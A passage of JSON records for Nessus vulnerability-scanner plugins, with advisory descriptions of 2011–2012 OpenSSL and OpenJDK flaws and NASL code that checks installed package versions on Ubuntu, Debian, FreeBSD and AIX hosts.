cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8g-4ubuntu3.17\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8k-7ubuntu8.10\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libssl0.9.8\", pkgver:\"0.9.8o-5ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libssl1.0.0\", pkgver:\"1.0.0e-2ubuntu4.4\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libssl0.9.8 / libssl1.0.0\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:38:58", "description": "Multiple vulnerabilities have been found in OpenSSL. The Common Vulnerabilities and Exposures project identifies the following issues :\n\n - CVE-2012-0884 Ivan Nestlerode discovered a weakness in the CMS and PKCS #7 implementations that could allow an attacker to decrypt data via a Million Message Attack (MMA).\n\n - CVE-2012-1165 It was discovered that a NULL pointer could be dereferenced when parsing certain S/MIME messages, leading to denial of service.\n\n - CVE-2012-2110 Tavis Ormandy, Google Security Team, discovered a vulnerability in the way DER-encoded ASN.1 data is parsed that can result in a heap overflow.\n\nAdditionally, the fix for CVE-2011-4619 has been updated to address an issue with SGC handshakes.\n\nTomas Hoger, Red Hat, discovered that the fix for CVE-2012-2110 for the 0.9.8 series of OpenSSL was incomplete. It has been assigned the CVE-2012-2131 identifier.", "cvss3": {}, "published": "2012-04-20T00:00:00", "type": "nessus", "title": "Debian DSA-2454-2 : openssl - multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4619", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:openssl", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2454.NASL", "href": "https://www.tenable.com/plugins/nessus/58804", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2454. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58804);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0884\", \"CVE-2012-1165\", \"CVE-2012-2110\", \"CVE-2012-2131\");\n script_bugtraq_id(52764, 53158);\n script_xref(name:\"DSA\", value:\"2454\");\n\n script_name(english:\"Debian DSA-2454-2 : openssl - multiple vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been found in OpenSSL. The Common\nVulnerabilities and Exposures project identifies the following issues\n:\n\n - CVE-2012-0884\n Ivan Nestlerode discovered a weakness in the CMS and\n PKCS #7 implementations that could allow an attacker to\n decrypt data via a Million Message Attack (MMA).\n\n - CVE-2012-1165\n It was discovered that a NULL pointer could be\n dereferenced when parsing certain S/MIME messages,\n leading to denial of service.\n\n - CVE-2012-2110\n Tavis Ormandy, Google Security Team, discovered a\n vulnerability in the way DER-encoded ASN.1 data is\n parsed that can result in a heap overflow.\n\nAdditionally, the fix for CVE-2011-4619 has been updated to address an\nissue with SGC handshakes.\n\nTomas Hoger, Red Hat, discovered that the fix for CVE-2012-2110 for\nthe 0.9.8 series of OpenSSL was incomplete. It has been assigned the\nCVE-2012-2131 identifier.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0884\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-1165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/openssl\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2454\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the openssl packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 0.9.8o-4squeeze12.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libcrypto0.9.8-udeb\", reference:\"0.9.8o-4squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libssl-dev\", reference:\"0.9.8o-4squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libssl0.9.8\", reference:\"0.9.8o-4squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libssl0.9.8-dbg\", reference:\"0.9.8o-4squeeze12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"openssl\", reference:\"0.9.8o-4squeeze12\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-05T14:44:12", "description": "Problem description :\n\nOpenSSL fails to clear the bytes used as block cipher padding in SSL 3.0 records when operating as a client or a server that accept SSL 3.0 handshakes. As a result, in each record, up to 15 bytes of uninitialized memory may be sent, encrypted, to the SSL peer. This could include sensitive contents of previously freed memory.\n[CVE-2011-4576]\n\nOpenSSL support for handshake restarts for server gated cryptography (SGC) can be used in a denial-of-service attack. [CVE-2011-4619]\n\nIf an application uses OpenSSL's certificate policy checking when verifying X509 certificates, by enabling the X509_V_FLAG_POLICY_CHECK flag, a policy check failure can lead to a double-free.\n[CVE-2011-4109]\n\nA weakness in the OpenSSL PKCS #7 code can be exploited using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the million message attack (MMA). [CVE-2012-0884]\n\nThe asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp functions, in OpenSSL contains multiple integer errors that can cause memory corruption when parsing encoded ASN.1 data. This error can occur on systems that parse untrusted ASN.1 data, such as X.509 certificates or RSA public keys. [CVE-2012-2110]", "cvss3": {}, "published": "2012-06-28T00:00:00", "type": "nessus", "title": "FreeBSD : FreeBSD -- OpenSSL multiple vulnerabilities (2ae114de-c064-11e1-b5e0-000c299b62e1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4109", "CVE-2011-4576", "CVE-2011-4619", "CVE-2012-0884", "CVE-2012-2110"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:freebsd", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_2AE114DEC06411E1B5E0000C299B62E1.NASL", "href": "https://www.tenable.com/plugins/nessus/59747", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59747);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4109\", \"CVE-2011-4576\", \"CVE-2011-4619\", \"CVE-2012-0884\", \"CVE-2012-2110\");\n script_bugtraq_id(51281, 52428, 53158);\n script_xref(name:\"FreeBSD\", value:\"SA-12:01.openssl\");\n\n script_name(english:\"FreeBSD : FreeBSD -- OpenSSL multiple vulnerabilities (2ae114de-c064-11e1-b5e0-000c299b62e1)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Problem description :\n\nOpenSSL fails to clear the bytes used as block cipher padding in SSL\n3.0 records when operating as a client or a server that accept SSL 3.0\nhandshakes. As a result, in each record, up to 15 bytes of\nuninitialized memory may be sent, encrypted, to the SSL peer. This\ncould include sensitive contents of previously freed memory.\n[CVE-2011-4576]\n\nOpenSSL support for handshake restarts for server gated cryptography\n(SGC) can be used in a denial-of-service attack. [CVE-2011-4619]\n\nIf an application uses OpenSSL's certificate policy checking when\nverifying X509 certificates, by enabling the X509_V_FLAG_POLICY_CHECK\nflag, a policy check failure can lead to a double-free.\n[CVE-2011-4109]\n\nA weakness in the OpenSSL PKCS #7 code can be exploited using\nBleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the\nmillion message attack (MMA). [CVE-2012-0884]\n\nThe asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp\nfunctions, in OpenSSL contains multiple integer errors that can cause\nmemory corruption when parsing encoded ASN.1 data. This error can\noccur on systems that parse untrusted ASN.1 data, such as X.509\ncertificates or RSA public keys. [CVE-2012-2110]\"\n );\n # https://vuxml.freebsd.org/freebsd/2ae114de-c064-11e1-b5e0-000c299b62e1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32392d4e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:FreeBSD\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=7.4<7.4_8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=8.1<8.1_10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=8.2<8.2_8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=8.3<8.3_2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=9.0<9.0_2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:26:50", "description": "The version of OpenSSL running on the remote host is affected by the following vulnerabilities :\n\n - The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack. (CVE-2012-0884)\n\n - The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250. (CVE-2012-1165)\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110)\n\n - Multiple integer signedness errors in crypto/buffer/buffer.c in OpenSSL allow remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-2110. (CVE-2012-2131)\n\n - Integer underflow in OpenSSL when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over- read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation. (CVE-2012-2333)", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "nessus", "title": "AIX OpenSSL Advisory : openssl_advisory4.asc", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-7250", "CVE-2012-0884", "CVE-2012-1165", "CVE-2012-2110", "CVE-2012-2131", "CVE-2012-2333"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix"], "id": "AIX_OPENSSL_ADVISORY4.NASL", "href": "https://www.tenable.com/plugins/nessus/73562", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory openssl_advisory4.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73562);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\n \"CVE-2012-0884\",\n \"CVE-2012-1165\",\n \"CVE-2012-2110\",\n \"CVE-2012-2131\",\n \"CVE-2012-2333\"\n );\n script_bugtraq_id(52428, 52764, 53158, 53212, 53476);\n\n script_name(english:\"AIX OpenSSL Advisory : openssl_advisory4.asc\");\n script_summary(english:\"Checks the version of the openssl packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote AIX host is running a vulnerable version of OpenSSL.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of OpenSSL running on the remote host is affected by the\nfollowing vulnerabilities :\n\n - The implementation of Cryptographic Message Syntax (CMS)\n and PKCS #7 in OpenSSL does not properly restrict\n certain oracle behavior, which makes it easier for\n context-dependent attackers to decrypt data via a\n Million Message Attack (MMA) adaptive chosen ciphertext\n attack. (CVE-2012-0884)\n\n - The mime_param_cmp function in crypto/asn1/asn_mime.c in\n OpenSSL allows remote attackers to cause a denial of\n service (NULL pointer dereference and application crash)\n via a crafted S/MIME message, a different vulnerability\n than CVE-2006-7250. (CVE-2012-1165)\n\n - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c\n in OpenSSL does not properly interpret integer data,\n which allows remote attackers to conduct buffer overflow\n attacks, and cause a denial of service (memory\n corruption) or possibly have unspecified other impact,\n via crafted DER data, as demonstrated by an X.509\n certificate or an RSA public key. (CVE-2012-2110)\n\n - Multiple integer signedness errors in\n crypto/buffer/buffer.c in OpenSSL allow remote attackers\n to conduct buffer overflow attacks, and cause a denial\n of service (memory corruption) or possibly have\n unspecified other impact, via crafted DER data, as\n demonstrated by an X.509 certificate or an RSA public\n key. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2012-2110. (CVE-2012-2131)\n\n - Integer underflow in OpenSSL when TLS 1.1, TLS 1.2, or\n DTLS is used with CBC encryption, allows remote\n attackers to cause a denial of service (buffer over-\n read) or possibly have unspecified other impact via a\n crafted TLS packet that is not properly handled during a\n certain explicit IV calculation. (CVE-2012-2333)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://aix.software.ibm.com/aix/efixes/security/openssl_advisory4.asc\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\");\n script_set_attribute(attribute:\"solution\", value:\n\"A fix is available, and it can be downloaded from the AIX website.\n\nTo extract the fixes from the tar file :\n\n zcat openssl-0.9.8.1802.tar.Z | tar xvf -\n or\n zcat openssl-fips-12.9.8.1802.tar.Z | tar xvf -\n\nIMPORTANT : If possible, it is recommended that a mksysb backup of\nthe system be created. Verify it is both bootable and readable\nbefore proceeding.\n\nTo preview the fix installation :\n\n installp -apYd . openssl\n\nTo install the fix package :\n\n installp -aXYd . openssl\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/16\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\ninclude(\"aix.inc\");\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\noslevel = get_kb_item_or_exit(\"Host/AIX/version\");\nif ( oslevel != \"AIX-5.3\" && oslevel != \"AIX-6.1\" && oslevel != \"AIX-7.1\" )\n{\n oslevel = ereg_replace(string:oslevel, pattern:\"-\", replace:\" \");\n audit(AUDIT_OS_NOT, \"AIX 5.3 / 6.1 / 7.1\", oslevel);\n}\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nflag = 0;\n\nif (aix_check_package(release:\"5.3\", package:\"openssl.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"0.9.8.1801\", fixpackagever:\"0.9.8.1802\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", package:\"openssl.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"0.9.8.1801\", fixpackagever:\"0.9.8.1802\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", package:\"openssl.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"0.9.8.1801\", fixpackagever:\"0.9.8.1802\") > 0) flag++;\nif (aix_check_package(release:\"5.3\", package:\"openssl-fips.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"12.9.8.1801\", fixpackagever:\"12.9.8.1802\") > 0) flag++;\nif (aix_check_package(release:\"6.1\", package:\"openssl-fips.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"12.9.8.1801\", fixpackagever:\"12.9.8.1802\") > 0) flag++;\nif (aix_check_package(release:\"7.1\", package:\"openssl-fips.base\", minpackagever:\"0.0.0.0\", maxpackagever:\"12.9.8.1801\", fixpackagever:\"12.9.8.1802\") > 0) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : aix_report_get()\n );\n}\nelse\n{\n tested = aix_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl.base / openssl-fips.base\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:36:18", "description": "It was discovered that the Java HttpServer class did not limit the number of headers read from a HTTP request. A remote attacker could cause a denial of service by sending special requests that trigger hash collisions predictably. (CVE-2011-5035)\n\nATTENTION: this update changes previous Java HttpServer class behavior by limiting the number of request headers to 200. This may be increased by adjusting the sun.net.httpserver.maxReqHeaders property.\n\nIt was discovered that the Java Sound component did not properly check buffer boundaries. A remote attacker could use this to cause a denial of service or view confidential data. (CVE-2011-3563)\n\nIt was discovered that the Java2D implementation does not properly check graphics rendering objects before passing them to the native renderer. A remote attacker could use this to cause a denial of service or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that an off-by-one error exists in the Java ZIP file processing code. An attacker could us this to cause a denial of service through a maliciously crafted ZIP file. (CVE-2012-0501)\n\nIt was discovered that the Java AWT KeyboardFocusManager did not properly enforce keyboard focus security policy. A remote attacker could use this with an untrusted application or applet to grab keyboard focus and possibly expose confidential data. (CVE-2012-0502)\n\nIt was discovered that the Java TimeZone class did not properly enforce security policy around setting the default time zone. A remote attacker could use this with an untrusted application or applet to set a new default time zone and bypass Java sandbox restrictions.\n(CVE-2012-0503)\n\nIt was discovered the Java ObjectStreamClass did not throw an accurately identifiable exception when a deserialization failure occurred. A remote attacker could use this with an untrusted application or applet to bypass Java sandbox restrictions.\n(CVE-2012-0505)\n\nIt was discovered that the Java CORBA implementation did not properly protect repository identifiers on certain CORBA objects. A remote attacker could use this to corrupt object data. (CVE-2012-0506)\n\nIt was discovered that the Java AtomicReferenceArray class implementation did not properly check if an array was of the expected Object[] type. A remote attacker could use this with a malicious application or applet to bypass Java sandbox restrictions.\n(CVE-2012-0507).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-02-27T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : openjdk-6 vulnerabilities (USN-1373-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3563", "CVE-2011-5035", "CVE-2012-0497", "CVE-2012-0501", "CVE-2012-0502", "CVE-2012-0503", "CVE-2012-0505", "CVE-2012-0506", "CVE-2012-0507"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-cacao", "p-cpe:/a:canonical:ubuntu_linux:icedtea-6-jre-jamvm", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-headless", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-lib", "p-cpe:/a:canonical:ubuntu_linux:openjdk-6-jre-zero", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:11.10"], "id": "UBUNTU_USN-1373-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58130", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1373-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58130);\n script_version(\"1.23\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2011-3563\",\n \"CVE-2011-5035\",\n \"CVE-2012-0497\",\n \"CVE-2012-0501\",\n \"CVE-2012-0502\",\n \"CVE-2012-0503\",\n \"CVE-2012-0505\",\n \"CVE-2012-0506\",\n \"CVE-2012-0507\"\n );\n script_xref(name:\"USN\", value:\"1373-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : openjdk-6 vulnerabilities (USN-1373-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was discovered that the Java HttpServer class did not limit the\nnumber of headers read from a HTTP request. A remote attacker could\ncause a denial of service by sending special requests that trigger\nhash collisions predictably. (CVE-2011-5035)\n\nATTENTION: this update changes previous Java HttpServer class behavior\nby limiting the number of request headers to 200. This may be\nincreased by adjusting the sun.net.httpserver.maxReqHeaders property.\n\nIt was discovered that the Java Sound component did not properly check\nbuffer boundaries. A remote attacker could use this to cause a denial\nof service or view confidential data. (CVE-2011-3563)\n\nIt was discovered that the Java2D implementation does not properly\ncheck graphics rendering objects before passing them to the native\nrenderer. A remote attacker could use this to cause a denial of\nservice or to bypass Java sandbox restrictions. (CVE-2012-0497)\n\nIt was discovered that an off-by-one error exists in the Java ZIP file\nprocessing code. An attacker could us this to cause a denial of\nservice through a maliciously crafted ZIP file. (CVE-2012-0501)\n\nIt was discovered that the Java AWT KeyboardFocusManager did not\nproperly enforce keyboard focus security policy. A remote attacker\ncould use this with an untrusted application or applet to grab\nkeyboard focus and possibly expose confidential data. (CVE-2012-0502)\n\nIt was discovered that the Java TimeZone class did not properly\nenforce security policy around setting the default time zone. A remote\nattacker could use this with an untrusted application or applet to set\na new default time zone and bypass Java sandbox restrictions.\n(CVE-2012-0503)\n\nIt was 